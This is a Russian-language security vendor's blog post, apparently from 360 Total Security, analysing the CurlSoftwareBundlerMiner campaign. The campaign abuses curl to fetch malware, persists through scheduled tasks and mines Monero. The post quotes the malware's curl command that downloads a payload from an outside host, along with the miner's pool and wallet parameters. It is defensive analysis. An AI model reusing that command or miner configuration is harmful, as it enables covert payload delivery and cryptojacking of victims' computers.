CurlSoftwareBundlerMiner злоупотребляет инструментом с открытым исходным кодом и более 300 тысяч компьютеров заражены

22 Май. 2018 г.kate
Подробнее о 360 Total Security

В последнее время 360 Total Security обнаружили, что CryptoMiner активно распространяется и более 300 тысяч компьютеров заражены. Он злоупотребляет известными инструментами с открытым исходным кодом, cURL.exe и wget.exe, чтобы обмануть антивирус. Загружая вредоносное ПО с помощью известных хороших инструментов и скрыт в задачах системного расписания, он делает большинство антивирусов неспособным его обнаружить . На зараженных компьютерах установлены 7-8 программных обеспечений.После установки программных обеспечений этот CryptoMiner начинает майнинг. Мы назвали его CurlSoftwareBundlerMiner.

Анализ

Согласно нашему анализу, большинство жертв заражается, загружая инструменты, такие как программные трещины и генераторы ключей из ненадежных источников.

Инсталл CurlSoftwareBundlerMiner расшифровывается :


Скачать и злоупотребляют CURL.exe


Создать задачи расписания:

Два задачи расписания созданы:

Исполняемый файл первой задачи Curl:curl_7_54.exe, который содержит инструмент с открытым исходным кодом с встроенными параметрами командной строки «-f -s -L http://atotum.ru/f.exe -o “%UserProfile%\AppData\Roaming\curl\curl.exe».

После запуска вредоносное ПО загружен в папку «% UserProfile% \ AppData \ Roaming \ curl \ curl.exe».

Вторая задача Curls создан для запуска загруженной вредоносной программы, которая зарабатывает деньги для своих вендоров, путем установки программных обеспечений и майнинга криптовалют.

Первый загрузчик создается и начинает установить программные обеспечения.

1.tmp.exe содержит официальную цифровую подпись, LLC Mail.Ru и загружает файл na_runner.exe. После тихой установки он создает элементы запуска системы и изменяет стартовую страницу браузера.

Изменить стартовую страницу браузера:

Второй загрузчик создается и начинает установить программные обеспечения.

8.temp.exe несет ту же подпись с первой, и тихо устанавливает продвинутый браузер.

Скачать и установить CryptoMiner:

CryptoMiner содержит цифровую подпись TOV “RED TABURET”:

Скопировать себя в «C: \ WINDOWS \ Microsoft \ svchost.exe» и имитировать как системный сервис для майнинга криптовалют XMR.

«Параметры майнинга :
-a cryptonight
-o stratum+tcp://mine.moneropool.com:3333
-u 4B9Darzi85pHxc53y1KZ6BHpFhdFSbTMYHMbK5BCByM36HsbsXqVzHYHwkybR1272oaZ4zPJ2EP79bw4dRUJR9pLSebAhDM -p x»

Связанные файлы в MD5

«f81069b5b3f7d8274e563a628929cde2
4dbc6848a826c4e98587d8fecf390a47
cf464d1f8ff321a74fddb4e00c20876a»

Напоминание

В последние дни мы обнаружили, что многие вредоносные ПО — CryptoMiner активно распространяются. Мы настоятельно рекомендуем пользователям включать антивирус при установке новых приложений. Пользователям также рекомендуется запускать проверку на вирусы с помощью 360 Total Security, чтобы не стать жертвой CryptoMiner.

Скачать 360 Total Security: https://www.360totalsecurity.com

Подробнее о 360 Total Security